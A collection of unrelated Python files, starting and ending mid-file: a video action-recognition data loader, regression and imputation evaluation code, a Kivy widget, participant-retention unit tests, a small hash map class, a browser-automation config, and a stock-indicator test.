self.label2index = {label: index for index, label in enumerate(sorted(set(labels)))}
# Convert the list of label names into an array of label indices
self.label_array = np.array([self.label2index[label] for label in labels], dtype=int)
if dataset == "ucf101":
if not os.path.exists('dataloaders/actions_labels.txt'):
with open('dataloaders/ucf_labels.txt', 'w') as f:
for id, label in enumerate(sorted(self.label2index)):
f.writelines(str(id+1) + ' ' + label + '\n')
elif dataset == 'breakfast':
if not os.path.exists('dataloaders/actions_breakfast_labels.txt'):
with open('dataloaders/actions_labels.txt', 'w') as f:
for id, label in enumerate(sorted(self.label2index)):
f.writelines(str(id+1) + ' ' + label + '\n')
def __len__(self):
return len(self.fnames)
def __getitem__(self, index):
# Loading and preprocessing.
buffer = self.load_frames(self.fnames[index])
buffer = self.crop(buffer, self.clip_len, self.crop_size)
labels = np.array(self.label_array[index])
if self.split == 'test':
# Perform data augmentation
buffer = self.randomflip(buffer)
buffer = self.normalize(buffer)
buffer = self.to_tensor(buffer)
return torch.from_numpy(buffer), torch.from_numpy(labels)
def check_integrity(self):
if not os.path.exists(self.root_dir):
return False
else:
return True
def check_preprocess(self):
# TODO: Check image size in output_dir
if not os.path.exists(self.output_dir):
return False
elif not os.path.exists(os.path.join(self.output_dir, 'train')):
return False
for ii, video_class in enumerate(os.listdir(os.path.join(self.output_dir, 'train'))):
for video in os.listdir(os.path.join(self.output_dir, 'train', video_class)):
video_name = os.path.join(os.path.join(self.output_dir, 'train', video_class, video),
sorted(os.listdir(os.path.join(self.output_dir, 'train', video_class, video)))[0])
image = cv2.imread(video_name)
if np.shape(image)[0] != 128 or np.shape(image)[1] != 171:
return False
else:
break
if ii == 10:
break
return True
def preprocess(self):#jumps to preprocess
local_dir ="./break_not" #local output_directory
if not os.path.exists(local_dir):
os.mkdir(local_dir)
# Split train/val/test sets
count_d = 3
num_videos = 0
num_actions = 0
sframes,fframes,f_actions = [] , [] , []
for file in os.listdir(self.root_dir): #for any file inside the root directory
file_path = os.path.join(self.root_dir, file) #file path will be the path of the joined filename
for file2 in os.listdir(file_path): #create another loop to accommodate the second file
file_path_angle = os.path.join(file_path, file2) #add another path to the folder
#video_files=[name for name in os.list.dir(file_path_angle)] #this will give all the files on a list saved
video_files = [f for f in glob.glob(os.path.join(file_path_angle,'*.avi'))] #alternatively we can use the globe as mentioned
for filename_actions in glob.glob(os.path.join(file_path_angle, '*.txt')): #so for all the text files in etc. breakfast->PO4->stereo
#Convert the text_file to a .avi extension to compare the names
compare_name = filename_actions.split('.')
#print(compare_name)
txt_to_avi="."+str(compare_name[1])+".avi"
index = video_files.index(txt_to_avi)#print(str(num_videos)+ "our video is"+str(video_files[num_actions])+"but the filename is"+str(filename_actions))
print("The textfile is "+txt_to_avi+ " whereas, the video file is "+video_files[index])
with open(filename_actions, 'r') as f:
lines = f.readlines()
for i,file_line in enumerate(lines):
space = file_line.rsplit(' ') #splits the frames with the action list
f_actions.append(file_line.split(' ')[1]) # actions list stores all the actions for each video
frames =space[0].split('-') #frames get the initial and final frames for each action
sframes.append(frames[0]) #the sframes list stores all the start frames for each action
fframes.append(frames[1]) # the fframes list stores all the end frames for each action
#print("So for"+str(video_files[index])+"the text file was"+str(filename_actions[num_videos])+ "and the action was "+ str(f_actions[num_actions]))
self.process_video(file,file2,video_files[index],f_actions[num_actions],sframes[num_actions],fframes[num_actions],local_dir)
num_actions+=1
num_videos+=1
count_d+=1
print('Preprocessing finished.')
self.divide_dataset(local_dir)
def divide_dataset(self, root_dir):
if os.path.exists(self.output_dir):
if not os.path.exists(os.path.join(self.output_dir,'train')):
os.mkdir(os.path.join(self.output_dir,'train')) #create the first directory
os.mkdir(os.path.join(self.output_dir,'val')) # 2nd directory
os.mkdir(os.path.join(self.output_dir,'test')) #3 directory
else:
os.mkdir(self.output_dir)
os.mkdir(os.path.join(self.output_dir,'train')) #create the first directory
os.mkdir(os.path.join(self.output_dir, 'val')) # 2nd directory
os.mkdir(os.path.join(self.output_dir, 'test')) #3 directory
# Split train/val/test sets
for file in os.listdir(root_dir): #for any file inside the root directory
action_folder_path = os.path.join(root_dir, file) #file path will be the path of the joined filename
frame_folder_files = [name for name in os.listdir(action_folder_path)]
train_and_valid, test = train_test_split(frame_folder_files, test_size=0.2, random_state=42) #this signifies that our test dataset will e the 20% of the dataset - sklearn function#
train, val = train_test_split(train_and_valid, test_size=0.2, random_state=42) #this signifies that the validation dataset will be 20% of it , leaving 60% for training #
#Define the training, validation and testing directories that the frame folders will be moved to.
train_dir = os.path.join(self.output_dir, 'train',file) #creates the path for break->train->stir_milk->PO3_stereo_cereals_115-322
val_dir = os.path.join(self.output_dir, 'val', file) #creates the path for break->train->stir_milk
test_dir = os.path.join(self.output_dir, 'test',file) #creates the path for break->train->stir_milk
if not os.path.exists(train_dir):
os.mkdir(train_dir)
if not os.path.exists(val_dir):
os.mkdir(val_dir)
if not os.path.exists(test_dir):
os.mkdir(test_dir)
for frame_folders in train:
#get only the last directory of the path frame_folders
frame_folder = os.path.join(root_dir,file,frame_folders)
shutil.move(frame_folder,train_dir)
for frame_folders in val:
frame_folder = os.path.join(root_dir,file,frame_folders)
shutil.move(frame_folder,val_dir)
for frame_folders in test:
frame_folder = os.path.join(root_dir,file,frame_folders)
shutil.move(frame_folder,test_dir)
print('Dataset Division finished.')
def process_video(self,file,file2,video,f_actions,sframes,fframes,save_dir): #to explain:f_actions holds the actions of the video file , sframes is the list that holds all the starting frames , fframes is the list that holds all the final -finishing frames
# Initialize a VideoCapture object to read video data into a numpy array
head, tail = os.path.split(video)
video_filename = tail.split('.')[0] #from the video file we take only the name of it and set it as the name of the new folder created (for us this will not be needed)
#print(video_filename)
capture = cv2.VideoCapture(video) # now using the cv2 library we stat a capture for the video in the root directory path
#convert the string list to an integer list
#sframes=list(map(int,sframes))
#fframes=list(map(int,fframes))
frame_count = int(capture.get(cv2.CAP_PROP_FRAME_COUNT)) #get numbers of frames for the video
frame_width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH)) #get the frame width
frame_height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT)) #get the frame height
# Make sure splited video has at least 16 frames
EXTRACT_FREQUENCY = 4
if frame_count // EXTRACT_FREQUENCY <= 16:
EXTRACT_FREQUENCY -= 1
if frame_count // EXTRACT_FREQUENCY <= 16:
EXTRACT_FREQUENCY -= 1
if frame_count // EXTRACT_FREQUENCY <= 16:
EXTRACT_FREQUENCY -= 1
count = 0 #it starts from 0
i = 1 #it starts at 1 because all are frames start from 1 not 0
retaining = True
#stop = 0 #initialisation of stop
#stop_count = 0 #set it as 0 initially to get the first element of the sframes and fframes lists
#three=3
#stop = "".join(map(str, fframes)) #define stop as the final frame etc.110
#start ="".join(map(str, sframes))
#print(stop)
#print(start)
#convert to int
stop = int(fframes)
start =int(sframes)
f_name = f_actions #this will be the action name
dataset_directory =save_dir
#print(frame_count )#count, frame_count, retaining)
while (count < frame_count and retaining): #so as long as the counter is less than the total number of frames and retaining variable is true
retaining, frame = capture.read() # we keep reading the frames from the video
#print("The number of "+ str(count) +"and the number of frames "+ str(stop))
if frame is None:
continue
#dataset_directory = os.path.dirname(save_dir) #remove the previous folder-component of the path ,we are left only with the directory. etc. C:/break/train
save_dir1 = os.path.join(dataset_directory,str(f_name)) #this is the final save directory. It will be of the form C:/break/train/stir_milk
if not os.path.exists(os.path.join(save_dir1)): #create the path of the new folder with the video name if it doesnt exist
os.mkdir(save_dir1)
video_filename_path = str(file)+"_"+str(file2)+"_"+str(video_filename)+"_"+str(start)+"_"+str(stop)
if not os.path.exists(os.path.join(save_dir1, video_filename_path)): #create the path of the new folder with the video name if it doesnt exist
os.mkdir(os.path.join(save_dir1, video_filename_path)) #make it
#print(count % EXTRACT_FREQUENCY)
if count>=start: #count % EXTRACT_FREQUENCY == 0:
#define the video_filename path
#video_filename_path = str(file)+"_"+str(file2)+"_"+str(video_filename)+"_"+str(sframes[stop_count])+"_"+str(fframes[stop_count])
#print("write") #store all the frames accordning to its frame number .The dirname removes the last folder-component from the save_directory
if(count==stop):
#print( "the" + str(stop)+ " is " + str(video_filename_path)+"at frame"+str(count)) #check which video stops
break
#if statement to check if we need to switch the frame packet
if (frame_height != self.resize_height) or (frame_width != self.resize_width):
frame = cv2.resize(frame, (self.resize_width, self.resize_height))
cv2.imwrite(filename=os.path.join(save_dir1, video_filename_path, '0{}.jpg'.format(str(i))), img=frame)
i += 1
count += 1 #and keep counting until the video is fully read and saved
# Release the VideoCapture once it is no longer needed
capture.release()
def randomflip(self, buffer):
"""Horizontally flip the given image and ground truth randomly with a probability of 0.5."""
if np.random.random() < 0.5:
for i, frame in enumerate(buffer):
frame = cv2.flip(buffer[i], flipCode=1)
buffer[i] = cv2.flip(frame, flipCode=1)
return buffer
def normalize(self, buffer):
for i, frame in enumerate(buffer):
frame -= np.array([[[90.0, 98.0, 102.0]]])
buffer[i] = frame
return buffer
def to_tensor(self, buffer):
return buffer.transpose((3, 0, 1, 2))
def load_frames(self, file_dir):
frames = sorted([os.path.join(file_dir, img) for img in os.listdir(file_dir)])
frame_count = len(frames)
while frame_count <= 16:
frame_count += 1
buffer = np.empty((frame_count, self.resize_height, self.resize_width, 3), np.dtype('float32'))
i = 0
frame = None
for _, frame_name in enumerate(frames):
frame = np.array(cv2.imread(frame_name)).astype(np.float64)
buffer[i] = frame
i += 1
#if frame is None:
#print(file_dir)
while i < 16:
buffer[i] = frame
i+=1
return buffer
def crop(self, buffer, clip_len, crop_size):
# randomly select time index for temporal jittering
time_index = np.random.randint(buffer.shape[0] - clip_len)
# Randomly select start indices in order to crop the video
height_index = np.random.randint(buffer.shape[1] - crop_size)
width_index = np.random.randint(buffer.shape[2] - crop_size)
# Crop and jitter the video using indexing. The spatial crop is performed on
# the entire array, so each frame is cropped in the same location. The temporal
# jitter takes place via the selection of consecutive frames
buffer = buffer[time_index:time_index + clip_len,
height_index:height_index + crop_size,
width_index:width_index + crop_size, :]
return buffer
if __name__ == "__main__":
from torch.utils.data import DataLoader
train_data = VideoDataset(dataset='breakfast', split='test', clip_len=8, preprocess=False) #execute the class for the test dataset ( i have the impression the validation dataset is never executed)
train_loader = DataLoader(train_data, batch_size=100, shuffle=True, num_workers=4)
for i, sample in enumerate(train_loader):
inputs = sample[0]
labels = sample[1]
print(inputs.size())
print(labels)
if i == 1:
break
|
11547425
|
from sklearn.linear_model import LinearRegression
import numpy as np
import torch
import pickle
import joblib
import time
import os.path
from os import path
from training.baseline import baseline_inpute
from utils.utils import construct_missing_X_from_mask
def linear_regression(data, args, log_path, load_path):
t0 = time.time()
n_row, n_col = data.df_X.shape
x = data.x.clone().detach()
edge_index = data.edge_index.clone().detach()
train_edge_mask = data.train_edge_mask.numpy()
train_edge_index = data.train_edge_index.clone().detach()
train_edge_attr = data.train_edge_attr.clone().detach()
test_edge_index = data.test_edge_index.clone().detach()
test_edge_attr = data.test_edge_attr.clone().detach()
y = data.y.detach().numpy()
train_y_mask = data.train_y_mask.clone().detach()
# print(torch.sum(train_y_mask))
test_y_mask = data.test_y_mask.clone().detach()
y_train = y[train_y_mask]
y_test = y[test_y_mask]
if args.method == 'gnn':
model = torch.load(load_path+'model.pt',map_location=torch.device('cpu'))
model.eval()
impute_model = torch.load(load_path+'impute_model.pt',map_location=torch.device('cpu'))
impute_model.eval()
predict_model = torch.load(load_path+'predict_model.pt',map_location=torch.device('cpu'))
predict_model.eval()
t_load = time.time()
with torch.no_grad():
x_embd = model(x, train_edge_attr, train_edge_index)
X = impute_model([x_embd[edge_index[0, :int(n_row * n_col)]], x_embd[edge_index[1, :int(n_row * n_col)]]])
t_impute = time.time()
X = torch.reshape(X, [n_row, n_col])
y_pred = predict_model(X)[:, 0]
y_pred_test = y_pred[test_y_mask].detach().numpy()
t_reg = time.time()
else:
if args.method == 'gnn_mdi':
model = torch.load(load_path+'model.pt',map_location=torch.device('cpu'))
model.eval()
impute_model = torch.load(load_path+'impute_model.pt',map_location=torch.device('cpu'))
impute_model.eval()
t_load = time.time()
with torch.no_grad():
x_embd = model(x, train_edge_attr, train_edge_index)
x_pred = impute_model([x_embd[test_edge_index[0], :], x_embd[test_edge_index[1], :]])
t_impute = time.time()
x_pred = x_pred[:int(test_edge_attr.shape[0] / 2)]
X_true, X_incomplete = construct_missing_X_from_mask(train_edge_mask, data.df_X)
X = X_incomplete
for i in range(int(test_edge_attr.shape[0] / 2)):
assert X_true[test_edge_index[0, i], test_edge_index[1, i] - y.shape[0]] == test_edge_attr[i]
X[test_edge_index[0, i], test_edge_index[1, i] - y.shape[0]] = x_pred[i]
else:
X_true, X_incomplete = construct_missing_X_from_mask(train_edge_mask, data.df_X)
t_load = time.time()
X = baseline_inpute(X_incomplete, args.method, args.level)
t_impute = time.time()
reg = LinearRegression().fit(X[train_y_mask, :], y_train)
y_pred_test = reg.predict(X[test_y_mask, :])
t_reg = time.time()
rmse = np.sqrt(np.mean((y_pred_test - y_test) ** 2))
mae = np.mean(np.abs(y_pred_test - y_test))
t_test = time.time()
if path.exists(log_path + 'result.pkl'):
obj = joblib.load(log_path + 'result.pkl')
obj['args_linear_regression'] = args
else:
obj = dict()
obj['args'] = args
obj['load_path'] = load_path
obj['rmse'] = rmse
obj['mae'] = mae
obj['load_time'] = t_load - t0
obj['impute_time'] = t_impute - t_load
obj['reg_time'] = t_reg - t_impute
obj['test_time'] = t_test - t_reg
print('{}: rmse: {:.3g}, mae: {:.3g}'.format(args.method,rmse,mae))
pickle.dump(obj, open(log_path + 'result.pkl', "wb"))
|
11547459
|
import os,rootpath
rootpath.append(pattern='main.py') # add the directory of main.py to PATH
from kivy.uix.treeview import TreeView,TreeViewLabel
from kivy.uix.scrollview import ScrollView
from kivy.app import App
from kivy.properties import ObjectProperty
from kivy.core.window import Window
from kivy.uix.boxlayout import BoxLayout
import pysnooper
from plugins.display.resource_tree.tree_widget import TreeWidget
class ResourceTree(BoxLayout):
data=ObjectProperty(lambda:None)
def __init__(self, **kwargs):
super(ResourceTree, self).__init__()
self.bind(data=self.refresh)
self.size_hint_y = None
self.bind(minimum_height = self.setter('height'))
# self.bind(selected_node = self.update_selection)
self.hide_root=True
# @pysnooper.snoop()
def refresh(self,*arg):
if not hasattr(self.data,'tree'):
return
self.tree=TreeWidget(self.data.tree)
self.tree.bind(select_idx=self.data.setter('select_idx'))
self.tree.select_idx = self.auto_select()
self.clear_widgets()
self.add_widget(self.tree)
def auto_select(self):
try:
selected_data = self.data.get_selected_data()
if len(selected_data['children'])>0:
return self.data.select_idx + [len(selected_data['children'])-1]
else:
return self.data.select_idx
except Exception as e:
print (e)
class TestApp(App):
def __init__(self):
super(TestApp, self).__init__()
self.resource_tree=ResourceTree()
self.resource_tree.data.tree={'node_id': '1',
'children': [{'node_id': '1.1',
'children': [{'node_id': '1.1.1',
'children': [{'node_id': '1.1.1.1',
'children': []}]},
{'node_id': '1.1.2',
'children': []},
{'node_id': '1.1.3',
'children': []}]},
{'node_id': '1.2',
'children': []}]}
self.resource_tree.refresh()
def build(self):
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
root=BoxLayout()
window=ScrollView(scroll_type=["bars"], bar_width=20)
root.add_widget(window)
window.add_widget(self.resource_tree)
return root
if __name__ == '__main__':
TestApp().run()
|
11547495
|
import datetime
import pytz
from tests import test_data
from rdr_service.api_util import open_cloud_file
from rdr_service.offline import retention_eligible_import
from rdr_service import clock
from rdr_service.participant_enums import RetentionStatus, RetentionType
from tests.helpers.unittest_base import BaseTestCase
_FAKE_RETENTION_ELIGIBLE_BUCKET = "rdr_fake_retention_eligible_bucket"
TIME_1 = datetime.datetime(2020, 4, 1)
class RetentionEligibleImportTest(BaseTestCase):
def setUp(self):
super(RetentionEligibleImportTest, self).setUp()
def test_retention_eligible_import(self):
ps1 = self.data_generator.create_database_participant_summary()
ps2 = self.data_generator.create_database_participant_summary()
ps3 = self.data_generator.create_database_participant_summary()
ps4 = self.data_generator.create_database_participant_summary()
ps5 = self.data_generator.create_database_participant_summary()
participant_ids = [ps1.participantId, ps2.participantId, ps3.participantId, ps4.participantId]
bucket_name = _FAKE_RETENTION_ELIGIBLE_BUCKET
test_file = 'retention_test.csv'
test_date = datetime.datetime(2020, 10, 13, 0, 0, 0, 0)
pytz.timezone('US/Central').localize(test_date)
with clock.FakeClock(test_date):
self._create_ingestion_test_file(test_file, bucket_name, participant_ids)
task_data = {
"bucket": bucket_name,
"upload_date": test_date.isoformat(),
"file_path": bucket_name + '/' + test_file
}
retention_eligible_import.import_retention_eligible_metrics_file(task_data)
psr1 = self.send_get(f'Participant/P{ps1.participantId}/Summary')
self.assertEqual(psr1.get('retentionEligibleStatus'), str(RetentionStatus.ELIGIBLE))
self.assertEqual(psr1.get('retentionEligibleTime'), '2020-02-20T00:00:00')
self.assertEqual(psr1.get('lastActiveRetentionActivityTime'), '2020-02-10T00:00:00')
self.assertEqual(psr1.get('retentionType'), str(RetentionType.ACTIVE))
psr2 = self.send_get(f'Participant/P{ps2.participantId}/Summary')
self.assertEqual(psr2.get('retentionEligibleStatus'), str(RetentionStatus.ELIGIBLE))
self.assertEqual(psr2.get('retentionEligibleTime'), '2020-02-20T00:00:00')
self.assertEqual(psr2.get('lastActiveRetentionActivityTime'), '2020-02-10T00:00:00')
self.assertEqual(psr2.get('retentionType'), str(RetentionType.PASSIVE))
psr3 = self.send_get(f'Participant/P{ps3.participantId}/Summary')
self.assertEqual(psr3.get('retentionEligibleStatus'), str(RetentionStatus.ELIGIBLE))
self.assertEqual(psr3.get('retentionEligibleTime'), '2020-02-20T00:00:00')
self.assertEqual(psr3.get('lastActiveRetentionActivityTime'), '2020-02-10T00:00:00')
self.assertEqual(psr3.get('retentionType'), str(RetentionType.ACTIVE_AND_PASSIVE))
psr4 = self.send_get(f'Participant/P{ps4.participantId}/Summary')
self.assertEqual(psr4.get('retentionEligibleStatus'), str(RetentionStatus.NOT_ELIGIBLE))
self.assertEqual(psr4.get('retentionEligibleTime'), None)
self.assertEqual(psr4.get('retentionType'), 'UNSET')
psr5 = self.send_get(f'Participant/P{ps5.participantId}/Summary')
self.assertEqual(psr5.get('retentionEligibleStatus'), 'UNSET')
self.assertEqual(psr5.get('retentionEligibleTime'), None)
self.assertEqual(psr5.get('retentionType'), 'UNSET')
# test update with new file
test_file = 'retention_test_2.csv'
test_date = datetime.datetime(2020, 10, 14, 0, 0, 0, 0)
pytz.timezone('US/Central').localize(test_date)
with clock.FakeClock(test_date):
self._create_ingestion_test_file(test_file, bucket_name, participant_ids)
task_data = {
"bucket": bucket_name,
"upload_date": test_date.isoformat(),
"file_path": bucket_name + '/' + test_file
}
retention_eligible_import.import_retention_eligible_metrics_file(task_data)
psr1 = self.send_get(f'Participant/P{ps1.participantId}/Summary')
self.assertEqual(psr1.get('retentionEligibleStatus'), str(RetentionStatus.ELIGIBLE))
self.assertEqual(psr1.get('retentionEligibleTime'), '2020-03-20T00:00:00')
self.assertEqual(psr1.get('lastActiveRetentionActivityTime'), '2020-03-10T00:00:00')
self.assertEqual(psr1.get('retentionType'), str(RetentionType.PASSIVE))
psr2 = self.send_get(f'Participant/P{ps2.participantId}/Summary')
self.assertEqual(psr2.get('retentionEligibleStatus'), str(RetentionStatus.NOT_ELIGIBLE))
self.assertEqual(psr2.get('retentionEligibleTime'), None)
self.assertEqual(psr2.get('retentionType'), 'UNSET')
psr3 = self.send_get(f'Participant/P{ps3.participantId}/Summary')
self.assertEqual(psr3.get('retentionEligibleStatus'), str(RetentionStatus.ELIGIBLE))
self.assertEqual(psr3.get('retentionEligibleTime'), '2020-02-20T00:00:00')
self.assertEqual(psr3.get('lastActiveRetentionActivityTime'), '2020-02-10T00:00:00')
self.assertEqual(psr3.get('retentionType'), str(RetentionType.ACTIVE_AND_PASSIVE))
psr4 = self.send_get(f'Participant/P{ps4.participantId}/Summary')
self.assertEqual(psr4.get('retentionEligibleStatus'), str(RetentionStatus.ELIGIBLE))
self.assertEqual(psr4.get('retentionEligibleTime'), '2020-03-20T00:00:00')
self.assertEqual(psr4.get('lastActiveRetentionActivityTime'), '2020-03-10T00:00:00')
self.assertEqual(psr4.get('retentionType'), str(RetentionType.ACTIVE))
psr5 = self.send_get(f'Participant/P{ps5.participantId}/Summary')
self.assertEqual(psr5.get('retentionEligibleStatus'), 'UNSET')
self.assertEqual(psr5.get('retentionEligibleTime'), None)
self.assertEqual(psr5.get('retentionType'), 'UNSET')
ps = self.send_get("ParticipantSummary?retentionEligibleStatus=NOT_ELIGIBLE&_includeTotal=TRUE")
self.assertEqual(len(ps['entry']), 1)
ps = self.send_get("ParticipantSummary?retentionEligibleStatus=ELIGIBLE&_includeTotal=TRUE")
self.assertEqual(len(ps['entry']), 3)
ps = self.send_get("ParticipantSummary?retentionType=ACTIVE_AND_PASSIVE&retentionEligibleStatus=ELIGIBLE"
"&_includeTotal=TRUE")
self.assertEqual(len(ps['entry']), 1)
ps = self.send_get("ParticipantSummary?retentionType=PASSIVE&retentionEligibleStatus=ELIGIBLE"
"&_includeTotal=TRUE")
self.assertEqual(len(ps['entry']), 1)
ps = self.send_get("ParticipantSummary?retentionType=UNSET&_includeTotal=TRUE")
self.assertEqual(len(ps['entry']), 2)
ps = self.send_get("ParticipantSummary?retentionType=UNSET&retentionEligibleStatus=NOT_ELIGIBLE"
"&_includeTotal=TRUE")
self.assertEqual(len(ps['entry']), 1)
def test_lower_env_retention_metric_cronjob(self):
ps1 = self.data_generator.create_database_participant_summary()
ps2 = self.data_generator.create_database_participant_summary(
consentForStudyEnrollmentAuthored=TIME_1,
sampleStatus1ED10Time=TIME_1,
questionnaireOnTheBasicsAuthored=TIME_1,
questionnaireOnOverallHealthAuthored=TIME_1,
questionnaireOnLifestyleAuthored=TIME_1,
consentForElectronicHealthRecordsAuthored=TIME_1,
consentForDvElectronicHealthRecordsSharingAuthored=TIME_1,
consentForStudyEnrollment=1,
consentForElectronicHealthRecords=1,
questionnaireOnTheBasics=1,
questionnaireOnOverallHealth=1,
questionnaireOnLifestyle=1,
withdrawalStatus=1,
suspensionStatus=1,
samplesToIsolateDNA=1
)
retention_window = datetime.timedelta(days=100)
in_eighteen_month = datetime.datetime.now() - retention_window
ps3 = self.data_generator.create_database_participant_summary(
consentForStudyEnrollmentAuthored=TIME_1,
sampleStatus1ED10Time=TIME_1,
questionnaireOnTheBasicsAuthored=TIME_1,
questionnaireOnOverallHealthAuthored=TIME_1,
questionnaireOnLifestyleAuthored=TIME_1,
consentForElectronicHealthRecordsAuthored=TIME_1,
consentForDvElectronicHealthRecordsSharingAuthored=TIME_1,
questionnaireOnHealthcareAccessAuthored=in_eighteen_month,
consentForStudyEnrollment=1,
consentForElectronicHealthRecords=1,
questionnaireOnTheBasics=1,
questionnaireOnOverallHealth=1,
questionnaireOnLifestyle=1,
withdrawalStatus=1,
suspensionStatus=1,
samplesToIsolateDNA=1
)
ps4 = self.data_generator.create_database_participant_summary(
consentForStudyEnrollmentAuthored=TIME_1,
sampleStatus1ED10Time=TIME_1,
questionnaireOnTheBasicsAuthored=TIME_1,
questionnaireOnOverallHealthAuthored=TIME_1,
questionnaireOnLifestyleAuthored=TIME_1,
consentForElectronicHealthRecordsAuthored=TIME_1,
consentForDvElectronicHealthRecordsSharingAuthored=TIME_1,
questionnaireOnHealthcareAccessAuthored=in_eighteen_month,
ehrUpdateTime=in_eighteen_month,
consentForStudyEnrollment=1,
consentForElectronicHealthRecords=1,
questionnaireOnTheBasics=1,
questionnaireOnOverallHealth=1,
questionnaireOnLifestyle=1,
withdrawalStatus=1,
suspensionStatus=1,
samplesToIsolateDNA=1
)
retention_eligible_import.calculate_retention_eligible_metrics()
p1 = self.send_get(f'Participant/P{ps1.participantId}/Summary')
p2 = self.send_get(f'Participant/P{ps2.participantId}/Summary')
p3 = self.send_get(f'Participant/P{ps3.participantId}/Summary')
p4 = self.send_get(f'Participant/P{ps4.participantId}/Summary')
self.assertEqual(p1['retentionEligibleStatus'], str(RetentionStatus.NOT_ELIGIBLE))
self.assertEqual(p1['retentionType'], str(RetentionType.UNSET))
self.assertEqual(p2['retentionEligibleStatus'], str(RetentionStatus.ELIGIBLE))
self.assertEqual(p2['retentionEligibleTime'], TIME_1.strftime("%Y-%m-%dT%H:%M:%S"))
self.assertEqual(p2['retentionType'], str(RetentionType.PASSIVE))
self.assertEqual(p3['retentionEligibleStatus'], str(RetentionStatus.ELIGIBLE))
self.assertEqual(p3['retentionEligibleTime'], TIME_1.strftime("%Y-%m-%dT%H:%M:%S"))
self.assertEqual(p3['retentionType'], str(RetentionType.ACTIVE))
self.assertEqual(p4['retentionEligibleStatus'], str(RetentionStatus.ELIGIBLE))
self.assertEqual(p4['retentionEligibleTime'], TIME_1.strftime("%Y-%m-%dT%H:%M:%S"))
self.assertEqual(p4['retentionType'], str(RetentionType.ACTIVE_AND_PASSIVE))
def _create_ingestion_test_file(self, test_data_filename, bucket_name, participant_ids, folder=None):
test_data_file = self._open_test_file(test_data_filename, participant_ids)
self._write_cloud_csv(test_data_filename, test_data_file, folder=folder, bucket=bucket_name)
def _open_test_file(self, test_filename, participant_ids=None):
with open(test_data.data_path(test_filename)) as f:
lines = f.readlines()
csv_str = ""
for idx, line in enumerate(lines):
if '{pid}' in line:
line = line.replace('{pid}', str(participant_ids[idx-1]))
csv_str += line
return csv_str
def _write_cloud_csv(self, file_name, contents_str, bucket=None, folder=None):
if folder is None:
path = "/%s/%s" % (bucket, file_name)
else:
path = "/%s/%s/%s" % (bucket, folder, file_name)
with open_cloud_file(path, mode='wb') as cloud_file:
cloud_file.write(contents_str.encode("utf-8"))
|
11547501
|
import sys
import re
import string
class TclToCsHashMap:
keys = []
values = []
def __init__(self):
self.keys = []
self.values = []
def AddItem(self, key, value):
for i in range(len(self.keys)):
if key == self.keys[i]:
# print "Warning: Key already exists, value overwritten\n"
self.values[i] = value
return -1
pass
self.keys.append(key)
self.values.append(value)
def RemoveItem(self, key):
tempItem = self.GetItem(key)
self.keys.pop(self.getItemIndex(key))
self.values.pop(self.getItemIndex(key))
pass
def GetItemIndex(self,key):
for i in range(len(self.keys)):
if key == self.keys[i]:
return i
def GetItem(self,key):
try:
return self.values[self.GetItemIndex(key)]
except:
return None
def CombineWith(self,p):
for i in range(len(p.keys)):
self.AddItem(p.keys[i],p.values[i])
|
11547516
|
import numpy as np
import pandas as pd
import scipy
import statsmodels
"""
In this optional exercise, you should complete the function called
predictions(turnstile_weather). This function takes in our pandas
turnstile weather dataframe, and returns a set of predicted ridership values,
based on the other information in the dataframe.
You should attempt to implement another type of linear regression,
that you may have read about, such as ordinary least squares regression:
http://en.wikipedia.org/wiki/Ordinary_least_squares
This is your playground. Go wild!
How does your choice of linear regression compare to linear regression
with gradient descent?
You can look at the information contained in the turnstile_weather dataframe below:
https://www.dropbox.com/s/meyki2wl9xfa7yk/turnstile_data_master_with_weather.csv
Note: due to the memory and CPU limitation of our amazon EC2 instance, we will
give you a random subset (~15%) of the data contained in turnstile_data_master_with_weather.csv
If you receive a "server has encountered an error" message, that means you are hitting
the 30 second limit that's placed on running your program. See if you can optimize your code so it
runs faster.
"""
def predictions(dataframe):
#
# Your implementation goes here. Feel free to write additional
# helper functions
#
dummy_units = pandas.get_dummies(dataframe['UNIT'], prefix='unit')
features = dataframe[['rain', 'precipi', 'Hour', 'meantempi']].join(dummy_units)
values = dataframe[['ENTRIESn_hourly']]
m = len(values)
features, mu, sigma = normalize_features(features)
features['ones'] = np.ones(m)
features_array = np.array(features)
values_array = np.array(values).flatten()
#Set values for alpha, number of iterations.
alpha = 0.1 # please feel free to change this value
num_iterations = 75 # please feel free to change this value
#Initialize theta, perform gradient descent
theta_gradient_descent = np.zeros(len(features.columns))
theta_gradient_descent, cost_history = gradient_descent(features_array,
values_array,
theta_gradient_descent,
alpha,
num_iterations)
prediction = np.dot(features_array, theta_gradient_descent)
return prediction
def compute_r_squared(data, predictions):
SST = ((data-np.mean(data))**2).sum()
SSReg = ((predictions-np.mean(data))**2).sum()
r_squared = SSReg / SST
return r_squared
if __name__ == "__main__":
input_filename = "turnstile_data_master_with_weather.csv"
turnstile_master = pd.read_csv(input_filename)
predicted_values = predictions(turnstile_master)
r_squared = compute_r_squared(turnstile_master['ENTRIESn_hourly'], predicted_values)
print r_squared
|
11547550
|
config = {
# Time in seconds to sleep after every action. Used to deal with slow rendering.
"action-sleep-interval-seconds": 1,
# Timeout when we are searching for an element for the first time.
"action-small-timeout-seconds": 5,
# Timeout when we are searching for an element in lock mode.
"action-mode-timeout-seconds": 15,
# Timeout for wait until action.
"action-large-timeout-seconds": 600,
# Whether we run headless or not.
"run-headless": True,
# The obvious window sizes.
"window-width": 1920,
# The obvious window sizes.
"window-height": 1080,
}
|
11547609
|
from fate_arch.storage._types import StorageTableMetaType, StorageEngine
from fate_arch.storage._types import StandaloneStoreType, EggRollStoreType, \
HDFSStoreType, MySQLStoreType, \
PathStoreType, HiveStoreType, LinkisHiveStoreType, LocalFSStoreType
from fate_arch.storage._types import DEFAULT_ID_DELIMITER, StorageTableOrigin
from fate_arch.storage._session import StorageSessionBase
from fate_arch.storage._table import StorageTableBase, StorageTableMeta
|
11547614
|
import pytest
from stock_indicators import indicators
class TestAroon:
def test_standard(self, quotes):
results = indicators.get_aroon(quotes, 25)
assert 502 == len(results)
assert 477 == len(list(filter(lambda x: x.aroon_up is not None, results)))
assert 477 == len(list(filter(lambda x: x.aroon_down is not None, results)))
assert 477 == len(list(filter(lambda x: x.oscillator is not None, results)))
r = results[210]
assert 100 == float(r.aroon_up)
assert 000 == float(r.aroon_down)
assert 100 == float(r.oscillator)
r = results[293]
assert 000 == float(r.aroon_up)
assert +40 == float(r.aroon_down)
assert -40 == float(r.oscillator)
r = results[298]
